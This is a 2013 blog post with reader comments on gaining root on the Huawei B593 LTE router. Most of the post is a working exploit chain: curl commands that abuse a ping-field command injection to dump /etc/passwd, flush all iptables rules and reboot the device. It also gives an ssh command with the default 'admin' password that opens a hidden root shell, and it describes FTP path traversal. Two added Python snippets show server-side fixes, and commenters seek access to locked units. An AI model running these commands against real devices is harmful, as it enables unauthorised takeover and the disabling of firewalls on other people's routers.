Saturday, August 03, 2013

Gaining root shell on Huawei B593 4G LTE router

Huawei B593 has "few" security issues. If you want to play around, here are some tips.

Update 8/2014: If you have recent firmware, some of these have been fixed. See Jari's blog for up-to-date information.

1. Under diagnostics there's a "ping" feature that allows execution of commands as root. The web interface has JavaScript checks but nothing on the server side.

2. The FTP server feature allows entering ../.. as the home directory and thus gives full read/write access to the entire filesystem, not just the USB stick that was intended to be shared via FTP.

3. SSH access to the "ATP" console has a hidden command "shell" that drops you to a root shell. Disable iptables via the ping exploit and then ssh in to the device using "ssh admin@192.168.1.1 -s /bin/sh" with password "admin", type "shell" and that's it.
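The check that issue 2 is missing, as an added example (Python, not Huawei's firmware code): a user-supplied FTP home directory is canonicalised and rejected unless it stays inside the USB share. The mount point /mnt/usb is an assumption.

```python
import os

# Added example, not Huawei's code: confine a user-chosen FTP home directory to the
# USB share, the check whose absence lets "../.." expose the whole filesystem.
USB_ROOT = "/mnt/usb"  # assumed mount point for this example

def resolve_share_dir(requested, root=USB_ROOT):
    # Return the absolute directory inside root for the requested home, or raise.
    root = os.path.normpath(root)
    # A leading '/' is dropped so the request is always relative to the share.
    candidate = os.path.normpath(os.path.join(root, requested.lstrip("/")))
    # commonpath rather than startswith: "/mnt/usb2" must not count as inside "/mnt/usb".
    # On a live mount also apply os.path.realpath so symlinks on the stick cannot escape.
    if os.path.commonpath([root, candidate]) != root:
        raise ValueError("home %r resolves to %s, outside %s" % (requested, candidate, root))
    return candidate

def is_inside_share(requested, root=USB_ROOT):
    # True when the requested home would be accepted, False when it escapes the share.
    try:
        resolve_share_dir(requested, root)
        return True
    except ValueError:
        return False
```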

The rest is just a dump of my notes. You should be able to figure out what to do with them.

# Create cookie file for curl, only SessionID_R3 is set via HTTP headers, rest are controlled by javascript
echo -e "192.168.1.1\tFALSE\t/\tFALSE\t0\tFirstMenu\tAdmin_0"      >cookie.txt
echo -e "192.168.1.1\tFALSE\t/\tFALSE\t0\tSecondMenu\tAdmin_0_0"  >>cookie.txt
echo -e "192.168.1.1\tFALSE\t/\tFALSE\t0\tThirdMenu\tAdmin_0_0_0" >>cookie.txt

# Login and save new SessionID_R3 value, password field is your admin password in base64 encoded form
curl -bcookie.txt -ccookie.txt -H"Cookie: SessionID_R3=0; FirstMenu=Admin_0; SecondMenu=Admin_0_0; ThirdMenu=Admin_0_0_0; Language=en" -d"Username=admin&Password=YWRtaW4=" -s "http://192.168.1.1/index/login.cgi"

# Initiate ping
curl -bcookie.txt -ccookie.txt -d"foobar" -s "http://192.168.1.1/html/management/excutecmd.cgi?cmd=ping|127.0.0.1|-s|32|-c|3||-W|4&RequestFile=/html/management/diagnose.asp"

# Fetch results and do little cleanup
curl -bcookie.txt -ccookie.txt -s "http://192.168.1.1/html/management/pingresult.asp" | sed -e's/__finshed__.*//g' -e's/\\n/\n/g' | sed -e's/^"//g' -e's/^\ + \"//g'

# cpuinfo
curl -bcookie.txt -ccookie.txt -d"foobar" "http://192.168.1.1/html/management/excutecmd.cgi?cmd=ping|;cat|/proc/cpuinfo&RequestFile=/html/management/diagnose.asp"
curl -bcookie.txt -ccookie.txt -s "http://192.168.1.1/html/management/pingresult.asp" | sed -e's/__finshed__.*//g' -e's/\\n/\n/g' | sed -e's/^"//g' -e's/^\ + \"//g'

# process list
curl -bcookie.txt -ccookie.txt -d"foobar" "http://192.168.1.1/html/management/excutecmd.cgi?cmd=ping|;ps&RequestFile=/html/management/diagnose.asp"
curl -bcookie.txt -ccookie.txt -s "http://192.168.1.1/html/management/pingresult.asp" | sed -e's/__finshed__.*//g' -e's/\\n/\n/g' | sed -e's/^"//g' -e's/^\ + \"//g'

# dump /etc/passwd
curl -bcookie.txt -ccookie.txt -d"foobar" "http://192.168.1.1/html/management/excutecmd.cgi?cmd=ping|;cat|/etc/passwd&RequestFile=/html/management/diagnose.asp"
curl -bcookie.txt -ccookie.txt -s "http://192.168.1.1/html/management/pingresult.asp" | sed -e's/__finshed__.*//g' -e's/\\n/\n/g' | sed -e's/^"//g' -e's/^\ + \"//g'

# busybox components compiled in
curl -bcookie.txt -ccookie.txt -d"foobar" "http://192.168.1.1/html/management/excutecmd.cgi?cmd=ping|;busybox&RequestFile=/html/management/diagnose.asp"
curl -bcookie.txt -ccookie.txt -s "http://192.168.1.1/html/management/pingresult.asp" | sed -e's/__finshed__.*//g' -e's/\\n/\n/g' | sed -e's/^"//g' -e's/^\ + \"//g'

# list of files in /bin
curl -bcookie.txt -ccookie.txt -d"foobar" "http://192.168.1.1/html/management/excutecmd.cgi?cmd=ping|;ls|-al|bin/&RequestFile=/html/management/diagnose.asp"
curl -bcookie.txt -ccookie.txt -s "http://192.168.1.1/html/management/pingresult.asp" | sed -e's/__finshed__.*//g' -e's/\\n/\n/g' | sed -e's/^"//g' -e's/^\ + \"//g'

# active iptables rules
curl -bcookie.txt -ccookie.txt -d"foobar" "http://192.168.1.1/html/management/excutecmd.cgi?cmd=ping|;iptables|-L&RequestFile=/html/management/diagnose.asp"
curl -bcookie.txt -ccookie.txt -s "http://192.168.1.1/html/management/pingresult.asp" | sed -e's/__finshed__.*//g' -e's/\\n/\n/g' | sed -e's/^"//g' -e's/^\ + \"//g'

# active nat rules
curl -bcookie.txt -ccookie.txt -d"foobar" "http://192.168.1.1/html/management/excutecmd.cgi?cmd=ping|;iptables|-L|-t|nat&RequestFile=/html/management/diagnose.asp"
curl -bcookie.txt -ccookie.txt -s "http://192.168.1.1/html/management/pingresult.asp" | sed -e's/__finshed__.*//g' -e's/\\n/\n/g' | sed -e's/^"//g' -e's/^\ + \"//g'

# active mangle rules
curl -bcookie.txt -ccookie.txt -d"foobar" "http://192.168.1.1/html/management/excutecmd.cgi?cmd=ping|;iptables|-L|-t|mangle&RequestFile=/html/management/diagnose.asp"
curl -bcookie.txt -ccookie.txt -s "http://192.168.1.1/html/management/pingresult.asp" | sed -e's/__finshed__.*//g' -e's/\\n/\n/g' | sed -e's/^"//g' -e's/^\ + \"//g'

# flush all iptables rules
curl -bcookie.txt -ccookie.txt -d"foobar" "http://192.168.1.1/html/management/excutecmd.cgi?cmd=ping|;iptables|-F&RequestFile=/html/management/diagnose.asp"
curl -bcookie.txt -ccookie.txt -d"foobar" "http://192.168.1.1/html/management/excutecmd.cgi?cmd=ping|;iptables|-X&RequestFile=/html/management/diagnose.asp"
curl -bcookie.txt -ccookie.txt -d"foobar" "http://192.168.1.1/html/management/excutecmd.cgi?cmd=ping|;iptables|-t|nat|-F&RequestFile=/html/management/diagnose.asp"
curl -bcookie.txt -ccookie.txt -d"foobar" "http://192.168.1.1/html/management/excutecmd.cgi?cmd=ping|;iptables|-t|nat|-X&RequestFile=/html/management/diagnose.asp"
curl -bcookie.txt -ccookie.txt -d"foobar" "http://192.168.1.1/html/management/excutecmd.cgi?cmd=ping|;iptables|-t|mangle|-F&RequestFile=/html/management/diagnose.asp"
curl -bcookie.txt -ccookie.txt -d"foobar" "http://192.168.1.1/html/management/excutecmd.cgi?cmd=ping|;iptables|-t|mangle|-X&RequestFile=/html/management/diagnose.asp"

# reboot device
curl -bcookie.txt -ccookie.txt -d"foobar" "http://192.168.1.1/html/management/excutecmd.cgi?cmd=ping|;reboot&RequestFile=/html/management/diagnose.asp"
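The server-side validation that excutecmd.cgi lacks, as an added example (Python, not Huawei's firmware code): only the fields the diagnostics page legitimately sends are accepted, and they are handed to ping as an argv list rather than a shell string, so the ";" trick in the notes above is rejected. The flag value ranges are assumptions.

```python
import ipaddress
import re
import subprocess

# Added example, not Huawei's code: the server-side check excutecmd.cgi lacks. The UI
# sends cmd=ping|<host>|<flag>|<value>|...; the bug is that the joined fields reach a
# shell, so ';' in a field starts a second command. Here they become a validated argv.
_HOST_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9.-]{0,252}$")
# Flags the stock UI emits, with the range each value must stay in (assumed limits).
_ALLOWED_FLAGS = {"-s": (0, 65507), "-c": (1, 10), "-W": (1, 30)}

def valid_host(host):
    # An IP literal or a plain hostname; ';cat', '../..' and the like fail both tests.
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return bool(_HOST_RE.match(host))

def build_ping_argv(cmd):
    # Turn the raw cmd= parameter into a ping argv list, or raise ValueError.
    fields = [f for f in cmd.split("|") if f != ""]  # the stock UI sends one empty field
    if len(fields) < 2 or fields[0] != "ping":
        raise ValueError("only ping is exposed by this endpoint")
    host, opts = fields[1], fields[2:]
    if not valid_host(host):
        raise ValueError("not an IP address or hostname: %r" % host)
    if len(opts) % 2:
        raise ValueError("options must come as flag/value pairs")
    argv = ["ping"]
    for flag, value in zip(opts[::2], opts[1::2]):
        if flag not in _ALLOWED_FLAGS or not value.isdigit():
            raise ValueError("option rejected: %r %r" % (flag, value))
        lo, hi = _ALLOWED_FLAGS[flag]
        if not lo <= int(value) <= hi:
            raise ValueError("%s=%s is out of range" % (flag, value))
        argv += [flag, value]
    return argv + [host]  # host last, so it can never be read as a flag

def is_safe_ping(cmd):
    try:
        build_ping_argv(cmd)
        return True
    except ValueError:
        return False

def run_ping(cmd):
    # List argv with shell=False: the strings reach exec() exactly as validated.
    return subprocess.run(build_ping_argv(cmd), capture_output=True, text=True, timeout=60)
```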


8 comments:

  1. Hey. Good read :)

    Can you post the exact command to use with the ping utility to disable iptables? I keep getting errors with that, so I'm thinking this has been patched, or I'm just using the wrong commands.

    Cheers

  2. Hey, as the previous user stated... Good read indeed! :)

    Surprised this worked - or more like - actually was possible to do, to execute root commands on the box this way.

    Anyway, is it possible to remove the forced NAT setting from the Huawei by doing this?
    I have an LTE plan with an external WAN IP, the IP is DHCP but it's still a non-ISP-NATed IP.
    So right now I'm able to run whatever services on my computer without any bigger problem.

    What I would like to have is:
    Internet(LTE/4G) => Huawei B593 => Router/Firewall.

    So the WAN ip will be directed directly to my external Router/firewall.
    And have Huawei B593 to work in a bridged mode, only to passthrough the wan ip.

    If that's possible, I'll buy you a beer!

    Best Regards
    FF83

  3. If Huawei really patched these, which I find unlikely given their track record on security, just downgrade to exploitable firmware.

    Serving the external IP dynamically allocated by the ISP to a client on the LAN side with DHCP is a bit tricky. Some devices such as the Sierra Wireless Raven series can do it out of the box. I don't see any reason why one couldn't do the same with Linux. If you want to try that, my Pro Tip is: don't do it on an embedded platform. Install something like minimal Debian on a virtual machine with two interfaces, one for WAN and another for LAN. Disable all networking scripts and firewalls from the OS init scripts. After you get it working manually, start thinking how to do the same with the Huawei. Otherwise you have way too many moving parts to figure out.

    If a configuration using 1:1 NAT is acceptable, you simply inject rules to port forward all traffic to your firewall on the LAN port. You'll also need to find out how to make the custom configuration persist over a reboot of the Huawei router.

  4. I'm intrigued. What hardware and firmware is that exactly? I'm trying to get access to a Huawei B593u-12 with a V100R001C748SP104 firmware, without success so far.

  5. Hello,

    everything works except ssh-ing to the router. I've got 'subsystem request failed on channel 0' message. Any hints?

  6. Is this also working on this?

    Product Information
    Model: B593s-22
    SN:
    IMEI:
    Hardware version: Ver.B
    Firmware version: V200R001B180D20SP30C158
    Firmware build time: Aug 14 2013 / 18:11:26

    Can you teach me how to gain admin access? My account is only a user account and it was locked to the provider. Thank you.

  7. How do I set my B593s-22 into bridge mode, or gain access? I tried the above but it didn't work.

  8. Any chance you could post the source of the CGI scripts that you have on your -12 router? I am trying to find a way in on the B593s-22.
